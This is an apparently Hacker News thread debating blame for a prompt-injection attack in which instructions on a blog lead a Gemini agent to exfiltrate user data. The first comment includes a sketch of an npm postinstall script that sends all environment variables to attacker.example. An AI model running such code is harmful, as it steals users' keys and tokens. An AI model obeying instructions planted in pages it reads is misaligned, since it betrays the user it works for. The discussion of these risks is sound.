paxys 6 hours ago

I'm not quite convinced.

You're telling the agent "implement what it says on <this blog>", and the blog contains malicious instructions that exfiltrate your data. So Gemini is simply following your instructions.

It is more or less the same as running "npm install <malicious package>" on your own.

Ultimately, AI or not, you are the one responsible for validating dependencies and putting appropriate safeguards in place.
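
To make the analogy concrete: npm packages can run arbitrary code at install time, so the blame question is the same. A minimal sketch of a hostile postinstall script (attacker.example is made up for illustration):

    // hypothetical postinstall.ts, run automatically by `npm install`
    import { request } from "node:https";

    // grab whatever the environment holds: API keys, tokens, etc.
    const stolen = JSON.stringify(process.env);

    // ship it to the attacker (attacker.example is illustrative)
    request(
      { host: "attacker.example", method: "POST", path: "/collect" },
      () => {}
    ).end(stolen);

You chose to install the package; the script just ran with your permissions. Same with the agent.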

ArcHound 5 hours ago | parent | next

The article addresses that too with:

> Given that (1) the Agent Manager is a star feature allowing multiple agents to run at once without active supervision and (2) the recommended human-in-the-loop settings allow the agent to choose when to bring a human in to review commands, we find it extremely implausible that users will review every agent action and abstain from operating on sensitive data.

It's more of a "you have to guarantee in advance that no instructions remotely connected to the problem are malicious" requirement, which is a long stretch.
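
To illustrate, the per-command review those settings imply looks roughly like this (a sketch only; runAgentCommand and the prompt flow are hypothetical, not Gemini's actual API):

    // hypothetical approve-before-run gate around agent shell commands
    import * as readline from "node:readline/promises";
    import { execSync } from "node:child_process";

    async function runAgentCommand(cmd: string): Promise<void> {
      const rl = readline.createInterface({
        input: process.stdin,
        output: process.stdout,
      });
      const answer = await rl.question(
        `Agent wants to run: ${cmd}\nAllow? [y/N] `
      );
      rl.close();
      if (answer.trim().toLowerCase() === "y") {
        execSync(cmd, { stdio: "inherit" }); // runs only on explicit approval
      }
    }

Nobody answers that prompt carefully hundreds of times a day across multiple parallel agents.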

Nathanba 20 minutes ago | parent | prev | next

Right, but this product (agentic AI) is explicitly sold as being able to run on its own. So while I agree that these problems are somewhat inherent to AI... these companies are selling it anyway, even though they know it's going to be a big problem.

Earw0rm 5 hours ago | parent | prev

Right, but at least with supply-chain attacks the dependency tree is fixed and deterministic.

Nondeterministic systems are hard to debug, and this opens up a threat class that works analogously to supply-chain attacks but is much harder to detect and trace.
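
Concretely, a lockfile pins the entire tree, so a single audit covers every future install. A sketch of walking those pins, assuming the standard package-lock.json v2+ layout:

    // Print each locked package's integrity hash. The tree and hashes
    // are fixed, so one audit holds for every future `npm ci`.
    // An agent's run-to-run behavior offers no such pin.
    import { readFileSync } from "node:fs";

    const lock = JSON.parse(readFileSync("package-lock.json", "utf8"));
    for (const [name, pkg] of Object.entries(lock.packages ?? {})) {
      const integrity = (pkg as { integrity?: string }).integrity;
      if (name && integrity) {
        console.log(`${name}: ${integrity}`); // sha512 pin per package
      }
    }

With an agent there's nothing equivalent to diff or re-verify: the same prompt can take a different path tomorrow.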